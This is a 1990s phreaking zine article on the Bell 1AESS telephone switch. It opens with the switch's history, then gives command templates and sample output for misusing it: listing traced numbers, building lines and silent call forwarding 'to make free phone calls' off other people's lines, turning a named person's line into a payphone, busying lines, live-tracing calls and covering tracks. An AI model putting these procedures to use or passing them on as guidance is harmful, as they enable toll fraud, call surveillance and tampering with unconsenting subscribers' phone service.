(Second of two articles written for CoTNo #006 [Communications of The New Order])
The Tao of 1AESS..................................Dead Kat & Disorder
=========
-=-
-= The Tao of 1AESS =-
-=-=-=-=-=-=-=-=
-= DeadKat&Disorder =-
-=-
-= Special thanks to Gatsby and Mark Tabas =-
Introduction
-=-=-=-=-=-=
The Bell System's first trial of electronic switching took place in Morris,
Illinois, in 1960. The Morris trial culminated a 6-year development and
proved the viability of the stored-program control concept. The first
application of electronic local switching in the Bell System occurred in May
1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey.
The 1ESS switching system was designed for use in areas where large numbers
of lines and lines with heavy traffic (primarily business customers) are
served. The system has generally been used in areas serving between 10,000
and 65,000 lines and has been the primary replacement system for urban
step-by-step and panel systems. The ease and flexibility of adding new
services made 1ESS switching equipment a natural replacement vehicle in
city applications where the demand for new, sophisticated business and
residence services is high.
In 1976, the first electronic toll switching system to operate a digital
time-division switching network under stored-program control, the 4ESS
system, was placed in service. It used a new control, the 1A processor,
for the first time to gain a call carrying capacity in excess of 550,000
busy-hour calls. The 1A processor was also designed for local switching
application. It doubled the call-carrying capacity of the 1ESS switching
system and was introduced in 1976 in the first 1AESS switch. The network
capacity of 1ESS switching equipment was also doubled to allow the 1AESS
switch to serve 130,000 lines.
In addition to local telephone service, the 1AESS switches offer a variety
of special services. Custom Local Area Switching Services (CLASS) are
available as well Custom Calling Services. Business customers may select
offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications
Service, or electronic tandem switching.
Although more modern switches like 5ESS and DMS 200 have been developed, it
is estimated that some 50 percent of all switches are still 1AESS.
Commands
-=-=-=-=
The 1AESS uses a command line interface for all commands. The commands are
divided into three fields: action, identification, and data. The fields
are always separted by a colon. Every command is terminated by either a
period for verification commands or a 'ballbat' (!) for change commands.
The control-d is used to execute the command instead of a return. The
underscore is used as a backspace. Commands are always typed in 'all caps'.
The action field is the first field of the command and is ended by a colon.
The identification field is ended by the second colon. The identification
field has one or two subfields which are separated by a semicolon. Semicolons
are not used elsewhere in the command. The data field consists of keyword
units and is the remaining portion of the command.
Basic Machine Commands
-=-=-=-=-=-=-=-=-=-=-=
These commands provide useful information from the system. The WHO-RV-
command will tell you what CO it is and what version of the OS is installed.
If your output is scrolling off the screen press space to end scrolling.
The V-STOP- command will clear the buffer.
WHO-RV-. System information.
SPACE Stops output from scrolling.
V-STOP-. Free buffer of remaining LENS/INFO.
Channel Commands
-=-=-=-=-=-=-=-=
Channel commands are used to redirect input and output. If a switch won't
respond to a command use the OP:CHAN command to check on current channel.
If your channel is not responding, use the MON:CHAN command to switch output
and control to your terminal (the remote). You can check the status of the
RC with the RCCENSUS command.
OP:CHAN:MON! Shows all channels which are being monitored.
MON:CHAN SC1;CHAN LOC! Redirect output to remote screen.
STOP: MON;CHAN SC1;CHAN LOC! Redirect output to local screen.
(This command needs to be done after you
are finished to help cover your tracks)
OP:RCCENSUS! To see recent change status.
Tracing Commands
-=-=-=-=-=-=-=-=
CI-LIST- will give you a list of all numbers which are being traced
externally. It will not show you lines which are being traced
internally, ie: numbers inside one of the prefixes controlled
by the switch you are on.
CI-LIST-. Traced line list.
Check Features on Line
-=-=-=-=-=-=-=-=-=-=-=
The VF command is used to check the current settings on a line.
The DN XXXXXXX specifies the phone number of the line you wish to check.
Replace XXXXXXX with the seven digit phone number of the line you are
checking.
VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC! Check features of a line.
VF:DNSVY:DN XXXXXXX,1,LASFTRS! Display last Features
Call Features CWT- Call Waiting
CFB- Call Forward Busy - Busy=VM
CFV- Call Forwarding Variable
CFD- Call Forward Don't answer
TWC- Three Way Calling
TTC- Touch Tone
RCY- Ring Cycle
SC1- Speed Calling 1
SC2- Speed Calling 2
UNA- No Long Distance
PXX- Block all LD service (guess)
MWI- Message Waiting Indicator
CHD- centrex(unremarkable)
CPU- centrex(unremarkable)
CLI- Calling Line Identification (CID)
ACB- Automatic Call Back Feature (?)
BLN- Special Toll Billing
FRE- Free Calling
The standard output of a command appears below. The 'DN 348 2141' specifies
the number you are checking. The calling features will be listed on the
second line by their three letter acronyms. This line has call waiting
(CWT), a trace (TRC), and touch tone dialing (TTC).
Example of 1A output:
M 53 TR75 2 DN 348 2141 00000003
CWT TRC TTC
Searching For Free Lines
-=-=-=-=-=-=-=-=-=-=-=-=
The VFY command can be used to check if a line is in use. The output will
list the LEN (Line Equipment Number) for the line and its call features in
octal. If the LEN is all zeros, then that number has not been assigned.
Replace XXXXXXX with the number you wish to check. You must prefix the
phone number with 30. You can also check for unused LEN's using the VFY
command. Use the space bar to stop scrolling and the V-STOP command to
cancel when looking up free LEN's.
VFY-DN-30XXXXXXX. Search for free lines.
VFY-LEN-4100000000. List all free LENs.
VFY-TNN-XXXXXXXX. To get information on trunk.
The output for the VFY-DN command will appear like the one below. Notice
that this number has been assigned a LEN so it is in use.
M 06 TR01 796 9146
0 0 0 0
LEN 01 025 000
001 000 000 000 000 000 4
000 000 000 000 000 000 000 000
0 0 0 0
0 0 0 0 0
Searching for a Particular Feature on a Line (like trace)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
All line information is stored in the switch for its coverage area. The
switch is like a huge database in this sense. You can do global searches
on the switch for any feature. One especially interesting feature to search
for are traced numbers. Traced numbers listed this way are INTERNALLY
traced as opposed to globally traced numbers shown with the CI-LIST- command.
Global and internal trace lists are always very different. And remember,
be a good samaritan and call the person being traced and let them know! ;-)
VF:DNSVY:FEATRS,EXMATCH TRACE! Pull all numbers IN switch area with
trace on it (takes a sec).
You can exmatch for any LASS feature by replacing the keyword TRACE with any
call feature like call forwarding (CFB) and speed calling (SC1).
To See What Numbers Are on a Speed Calling List
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Another nice use for the VFY command is to see what is on a line's speed
calling list. Replace XXXXXXX with the target phone number. One devious
use is to look at the CO's speed call list to find other internal telco
numbers.
VFY-LIST-09XXXXXXX020000
09=mask 02=single list (one digit speed calling)
20=double list (two digit speed calling)
28= " "
36= " "
44= " "
To Build a Line
-=-=-=-=-=-=-=-
The recent change command (RC) is used to create and modify lines. Because
RC commands are usually very long and complex, they are typed on multiple
lines to simplify them. Each subfield of the data section of the command is
typed on a separate line ended by a slash (\) followed by pressing ctrl-d.
To create a line, you specify LINE in the identification field. Before
a line can be created, you must first locate an unused number by using the
VFY-DN command explained above. Once a free number has been found, you
use the VFY-LEN to find an available LEN. To build a new line, follow
these steps:
First, find spare LEN (VFY-LEN-4100000000.). Next find free line. Now type
in the RC commands using the following commands as a template:
RC:LINE:\ (create a line)
ORD 1\ (execute the command immediately)
TN XXXXXXX\ (telephone number)
LEN XXXXXXXX\ (len found from above)
LCC 1FR\ (line class code 1fr)
CFV\ (call forward)
XXX 288\ (type XXX, space, then the three digit PIC)
ld carrier - 222 - MCI
288 - AT&T
333 - Sprint, etc.)
! (BEWM, don't forget the ctrl-d!!)
(Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE
has taken affect)
Creating Call Forwarding Numbers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The call forwarding feature is the most important feature for hackers. By
creating a line or modifying an existing line with call forwarding, you can
than use it to make free phone calls. You set the line to call forward/
no ring and then give it the call forwarded number. This will allow you
to call the modified line and be instantly forwarded to your pre-chosen
destination.
First create a line using RC:LINE:, then modify the line using the following
commands as a template.
RC:CFV:\ (add call forwarding to a line.. begin: )
ORD 1\ (execute the command immediately)
BASE XXXXXXX\ (base number you are changing)
TO XXXXXXX\ (local - XXXXXXX : ld - XXXXXXXXXX )
PFX\ (set prefix to 1 if ld)
! (BEWM)
To Change Call Forward Number
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
It is safer to modify an existing call forward than to create a new line
solely for this purpose. You can use the VFY command and EXMATCH for CFB to
find lines with call forwarding. Before you can change the call forwarding
'TO' number you must delete the old one. Remove call forward number using
CFV:OUT with the template below.
RC:CFV;OUT:\ (remove call forward number...begin: )
ORD 1\ (execute command immediately)
BASE XXXXXXX\ (number to remove it from)
! (Yeeee-Hahhhahah)
Make Call Forward Not Ring
-=-=-=-=-=-=-=-=-=-=-=-=-=
The only drawback to call forwarding off someone's line is if rings they
might answer. To get around this, you add the call-forward no-ring option
(ICFRR) using the following as a template.
RC:LINE;CHG:\ (recent change line to be specified)
ORD 1\ (execute command immediately)
TN XXXXXXX\ (number you wanna fuck with)
ICFRR\ (this takes the ring off)
! (Go!)
Adding a feature to a line
-=-=-=-=-=-=-=-=-=-=-=-=-=
The RC:LINE;CHG: can also be used to add any other call feature. Use the
same template but change the feature.
RC:LINE;CHG:\ (this is used for changing features)
ORD 1\ (order number)
TN XXXXXXX (telephone number you are fucking with)
TWC\ (replace this with any feature you wish)
! (Fire!)
Removing a Feature
-=-=-=-=-=-=-=-=-=
Use the NO delimiter to remove a feature from a line.
RC:LINE;CHG:\ (change a feature)
ORD 1\ (effective immediately)
TN XXXXXXX\ (telephone number)
CFV NO\ (feature followed by NO)
! (Boo-Ya!)
Change Phone number into payphone
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
You've read about in the Hacker Crackdown, now you too can be 31337 and
change Gail Thackery's phone into a payphone. In fact you can change the
line class code (LCC) to anything you want. To display the LCC of a line
use the following and replace the XXXXXXX with the line you wish to view.
VF:DNSVY:LCC,DN XXXXXXX,1,PIC! (display line class code)
DTF = Payphone
1FR = Flat Rate
1MR = Measured Rate
1PC = One Pay Phone
CDF = DTF Coin
PBX = Private Branch Exchange
CFD = Coinless(ANI7) Charge-a-call
INW = InWATS (800!@#)
OWT = OutWATS
PBM = O HO/MO MSG REG (NO ANI)
PMB = LTG = 1 HO/MO (Regular ANI6)
(ani6 and ani7 - only good for DMS)
To change the line into a payphone use the RC:LINE;CHG command and modify
the LCC like the example below.
RC:LINE;CHG;\ (this is used for changing features)
ORD 1\ (order number)
TN XXXXXXX\ (telephone number you are fucking with)
LCC DTF\ (line class code you are changing to)
! (Make it so.)
*(You may have to remove some LASS features when doing this)*
To Kill a Line and Remove It Permanently
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
If you need to delete a line you have created (or haven't) use the following
syntax.
RC:LINE;OUT:\ (remove line)
ORD 1\ (effective immediately)
TN XXXXXXX\ (on this number)
! (GO!)
Monitoring Phone Calls
-=-=-=-=-=-=-=-=-=-=-=
There are powerful utilities to monitor calls and affect phone lines
available on a 1A. The T-DN- commands allow you to check the current
status of line and make it busy or idle. If a line happens to be active
you can use the NET-LINE- command to trace the call and find the numbers
for both calling parties.
T-DN-RD XXXXXXX. See if call in progress.
output: =1 line busy
=0 line idle
T-DN-MB XXXXXXX. Make line busy.
T-DN-MI XXXXXXX. Make line idle.
NET-LINE-XXXXXXX0000. To do a live trace on a phonenumber thru
switch.
NET-TNN-XXXXXX Same as above for trunk trace
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Appendix 1 - Common output messages seen on 1A switches
-=-=-=-=-=
** ALARM **
AR01 Office alarm
AR02 Alarm retired or transferred
AR03 Fuse blown
AR04 Unknown alarm scan point activated
AR05 Commercial power failure
AR06 Switchroom alarm via alarm grid
AR07 Power plant alarm
AR08 Alarm circuit battery loss
AR09 AMA bus fuse blown
AR10 Alarm configuration has been changed (retired,inhibited)
AR11 Power converter trouble
AR13 Carrier group alarm
AR15 Hourly report on building and power alarms
** AUTOMATIC TRUNK TEST **
AT01 Results of trunk test
** CARRIER GROUP **
CG01 Carrier group in alarm
CG03 Reason for above
** COIN PHONE **
CN02 List of pay phones with coin disposal problems
CN03 Possible Trouble
CN04 Phone taken out of restored service because of possible coin fraud
** COPY **
COPY Data copied from one address to another
** CALL TRACE **
CT01 Manually requested trace line to line, information follows
CT02 Manually requested trace line to trunk, information follows
CT03 Intraoffice call placed to a number with CLID
CT04 Interoffice call placed to a number with CLID
CT05 Call placed to number on the CI list
CT06 Contents of the CI list
CT07 ACD related trace
CT08 ACD related trace
CT09 ACD related trace
** DIGITAL CARRIER TRUNK **
DCT COUNTS Count of T carrier errors
** MEMORY DIAGNOSTICS **
DGN Memory failure in cs/ps diagnostic program
** DIGITAL CARRIER "FRAME" ERRORS **
FM01 DCT alarm activated or retired
FM02 Possible failure of entire bank not just frame
FM03 Error rate of specified digroup
FM04 Digroup out of frame more than indicated
FM05 Operation or release of the loop terminal relay
FM06 Result of digroup circuit diagnostics
FM07 Carrier group alarm status of specific group
FM08 Carrier group alarm count for digroup
FM09 Hourly report of carrier group alarms
FM10 Public switched digital capacity failure
FM11 PUC counts of carrier group errors
** MAINTENANCE **
MA02 Status requested, print out of MACII scratch pad
MA03 Hourly report of system circuits and units in trouble
MA04 Reports condition of system
MA05 Maintenance interrupt count for last hour
MA06 Scanners,network and signal distributors in trouble
MA07 Successful switch of duplicated unit (program store etc.)
MA08 Excessive error rate of named unit
MA09 Power should not be removed from named unit
MA10 OK to remove paper
MA11 Power manually removed from unit
MA12 Power restored to unit
MA13 Indicates central control active
MA15 Hourly report of # of times interrupt recovery program acted
MA17 Centrex data link power removed
MA21 Reports action taken on MAC-REX command
MA23 4 minute report, emergency action phase triggers are inhibited
** MEMORY **
MN02 List of circuits in trouble in memory
** NETWORK TROUBLE **
NT01 Network frame unable to switch off line after fault detection
NT02 Network path trouble Trunk to Line
NT03 Network path trouble Line to Line
NT04 Network path trouble Trunk to Trunk
NT06 Hourly report of network frames made busy
NT10 Network path failed to restore
** OPERATING SYSTEM STATUS **
OP:APS-0
OP:APSTATUS
OP:CHAN
OP:CISRC Source of critical alarm, automatic every 15 minutes
OP:CSSTATUS Call store status
OP:DUSTATUS Data unit status
OP:ERAPDATA Error analysis database output
OP:INHINT Hourly report of inhibited devices
OP:LIBSTAT List of active library programs
OP:OOSUNITS Units out of service
OP:PSSTATUS Program store status
** PLANT MEASUREMENTS **
PM01 Daily report
PM02 Monthly report
PM03 Response to a request for a specific section of report
PM04 Daily summary of IC/IEC irregularities
** REPORT **
REPT:ADS FUNCTION Reports that a ADS function is about to occur
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
REPT:ADS PROCEDURAL ERROR You fucked up
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
REPT:PROG CONT OFF-NORMAL System programs that are off or on
REPT:RC CENSUS Hourly report on recent changes
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
** RECENT CHANGE **
RC18 RC message response
** REMOVE **
RMV Removed from service
** RESTORE **
RST Restored to service status
** RINGING AND TONE PLANT **
RT04 Status of monitors
** SOFTWARE AUDIT **
SA01 Call store memory audit results
SA03 Call store memory audit results
** SIGNAL IRREGULARITY **
SIG IRR Blue box detection
SIG IRR INHIBITED Detector off
SIG IRR TRAF Half hour report of traffic data
** TRAFFIC CONDITION **
TC15 Reports overall traffic condition
TL02 Reason test position test was denied
TL03 Same as above
** TRUNK NETWORK **
TN01 Trunk diagnostic found trouble
TN02 Dial tone delay alarm failure
TN04 Trunk diag request from test panel
TN05 Trunk test procedural report or denials
TN06 Trunk state change
TN07 Response to a trunk type and status request
TN08 Failed incoming or outgoing call
TN09 Network relay failures
TN10 Response to TRK-LIST input, usually a request from test position
TN11 Hourly, status of trunk undergoing tests
TN16 Daily summary of precut trunk groups
** TRAFFIC OVERLOAD CONDITION **
TOC01 Serious traffic condition
TOC02 Reports status of less serious overload conditions
** TRANSLATION ** (shows class of service, calling features etc.)
TR01 Translation information, response to VFY-DN
TR03 Translation information, response to VFY-LEN
TR75 Translation information, response to VF:DNSVY
** **
TW02 Dump of octal contents of memory
Trace Output Appearance (COT - Customer Oriented Trace)
A 03 CT04 22 03 02 05 11 26 359 705 8500 <-- NUMBER CALLED
CPN 212 382 8923 <-- WHO CALLED
01/14/95 22:03:02 <-- TIME/DATE
#236 <-- JOB NUMBER
Appendix 2 - Miscellaneous 1A Commands found on logs from CO dumpsters:
-=-=-=-=-=
RMV::NPC 69!
UTL::QRY.CMAP 136!
UTL::QRY.SCON to 135! (as far out as to 12003!)
UTL::QRY.SCON 13615/01!
UTL::QRY.ALMS!
UTL::QRY,WHO!
UTL::QRY,ALL!
UTL::QRY,FPKG!
UTL::QRY,UNIT1,FTMI1, EQL
GRTH::UNIT1! (FT100) <-- comment written by command
GRTH::UNI1,FTMI1, EQL(L,R) (2,2) <-- Example
UTL::QRY.!
RMV::LINK 3!
DGN::LINK 3!
RST::LINK 3!
UTL::QRY.TPS!
RST::TAPE! (This and the next two commands were
UTL::BMTR.FROM DISK.TO TAPE! ALWAYS found together, and are pretty
RMV::TAPE! obvious)
SDIS::FROM 11204/03.TO 11204/04!
UTL::QRY.SCON.CH.TO 11204!
UTL::QRY.CMAP.TO 11204/03!
UTL::QRY,CMAP 01117!
SCON::RATE 96.FROM 11204/03.TO 11204/4!
LOGIN::USER DAX\
UTL::EQD,NPCS!
ADD::LINK 2,NPCAD E!
UTL::LOC,ETSI 101!
|_|____________Bay (These show physical locations
|____________Unit of trunks)
UTL::LOC,NPC 01117!
output - 1-01-38
|__|__|_________Bay
|__|_________Unit
|_________38(1/8) inches
Appendix 3 - Suggested reading
-=-=-=-=-=
Acronyms 1988 (Phrack #20, file 11)
Central Office Operations by Agent Steal (LoDTJ #4, file 4)
ESS & 1A Switching Systems by Ninja Master
The Fine Art of Telephony by Crimson Flash (Phrack #38, file 7)
Guide to 5ESS by Firm G.R.A.S.P. (Phrack #43, file 16)
Lifting Ma Bell's Cloak of Secrecy by VaxCat (Phrack #24, file 9)
Operator Services Position System by Bandito (Phun #5, file 8)
Peering Into the soul of ESS by Jack the Ripper (Phun #5, file 2)